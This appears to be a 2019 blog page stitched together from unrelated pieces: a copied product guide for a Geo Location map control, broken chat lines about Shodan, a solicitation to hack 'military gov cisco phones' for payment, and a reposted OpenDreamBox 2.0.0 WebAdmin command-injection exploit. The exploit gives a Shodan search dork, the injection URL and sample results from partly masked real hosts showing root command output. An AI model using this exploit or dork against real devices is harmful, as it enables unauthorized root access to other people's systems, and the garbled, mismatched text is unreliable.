Monday, February 11, 2019
hey...do "users'" are html adresses? can u look u at shodan?
Use the Geo Location control to display the user's location on a map instead of a static location.
You can use this control in association with the Map and OpenLayers API controls. However, the OpenLayers API might not be necessary, depending on the device. The content of the location object and the precision of these metrics depend on the device on which the user interface is running. Whichever the device, a latitude and longitude must be available through this object. Location is a context variable, which is available within the On Location
Resolved event of this control.
For this control to work, it must be connected to some sort of data network, such as a mobile, wifi, Ethernet, or similar network. If no connection exists, the control does not work. As a browser built-in security function, the page requests permission to access the user's location information.
Like the Geo Coder control, the Geo Location control adds another layer of information by allowing users to see where they are on a map. You can use it to provide a point of reference. For more efficiency, first place the OpenLayers API control at the top of the page or, at the very least, before the Map control. For more information, see Map control and OpenLayers API control.
Configuration properties
The configuration properties for the Geo Location control are listed in the following table:
| Configuration property | Description | Data type |
|---|---|---|
| Monitoring mode | Monitoring modes for the control: Once on Load, Continuous, Initially Stopped. | GeoMonitoringMode |
| High accuracy | If you select this option, location detection is more accurate but uses more battery power. | Boolean |
| Timeout | You can enter the number of milliseconds after which the device stops trying to detect the specified location. The default value is 6000ms. | Integer |
| Max age of data | You can enter, in milliseconds, the oldest geo location data that you accept. The default value is 0 ms. | Integer |
Example
In this example, you select an API key for a map, locate and display an address, customize the map aspect, and communicate the location to the map.
- Use the OpenLayers API control to specify an API key.
- Use the Geo Location control to find the user's location and display it on the Map.
- Use the Geo Coder control to display a physical address on a text control, such as Note, Output Text, Text, or others.
- Add the Map control to the Coach and adjust the appearance properties as appropriate.
- Add a Custom HTML control to have the Map Control communicate the coordinates to the map.
This HTML code reads as follows.
- function updateLocation(me, location)
- This function is called by the Geo Location control. The me parameter references Geo_Location1 and passes in location information.
- var map = page.ui.get("Map1")
- This function finds the map to enable communication with it.
- map.setCenter(location.latitude, location.longitude)
- This function uses the location information that was passed in to set the center of the map from the location.latitude and location.longitude parameter values.
- map.addMarker()
- This function adds a marker to the centered location.
- var coordinates= page.ui.get("Coordinates")
- This function retrieves the Coordinates text field.
- coordinates.setText("Latitude: " + location.latitude +" "+"Longitude: "+ location.longitude )
- This function sets the text field to the coordinates that are found.
The result shows the user's location as shown in the following map.
Additional resources
For information about how to create a coach, see Building coaches.
For information about standard properties (General, Configuration, Positioning, Visibility, and HTML Attributes), see Coach view properties.
For information about standard properties (General, Configuration, Positioning, Visibility, and HTML Attributes), see Coach view properties.
For information about associated geographical controls, see Geo Location control, Map control, and OpenLayers API control.
"hello world" french making theirselfs usefull :) ..ok..anyone interessed on hacking military gov cisco phones? take it...free tax...you pay me back later...
"hello world" french making theirselfs usefull 
..ok..anyone interessed on hacking military gov cisco phones? take it...free tax...you pay me back later...
..ok..anyone interessed on hacking military gov cisco phones? take it...free tax...you pay me back later...# Exploit Title: OpenDreamBox 2.0.0 - Plugin WebAdmin RCE
# Shodan Dork: "DreamBox" 200 ok"
# Date: 07/03/17
# Exploit Author: Jonatas Fil
# Vendor Homepage: https://www.dreamboxupdate.com
# Software Link: https://www.dreamboxupdate.com/opendreambox/2.0.0
# Version: 2.0.0
Vulnerabilty: Remote Command Execution via Command injection in Plugin
WebAdmin.
Tools: https://github.com/ninj4c0d3r/ShodanCli
----------------------------------------------------------------------------------------------------
p0c:
- First, Search in Shodan: "DreamBox" 200 ok.
(https://github.com/ninj4c0d3r/ShodanCli - My tool for search (need api) or
https://www.shodan.io)
- After, open the target and go to "Extra", wait a moment...
- In plugins, if WebAdmin Plugin is installed [VULNERABLE]:
Exploit : http://target.com:100000/webadmin/script?command=|YOUR_COMMAND
-----------------------------------------------------------------------------------------------------
Examples:
http://212.13.x.129:8081/webadmin/script?command=|uname -a : Linux dm7020hd 3.2-dm7020hd #1 SMP Sun Jun 21 15:26:04 CEST 2015 mips GNU/Linux
http://80.x.24.154:8880/webadmin/script?command=|id : uid=0(root) gid=0(root)
http://62.224.234.x:8081/webadmin/script?command=|pwd : /home/root
http://x.19.12.146:10000/webadmin/script?command=|cat /etc/issue : opendreambox 2.0.0 \n \l
Subscribe to:
Posts (Atom)
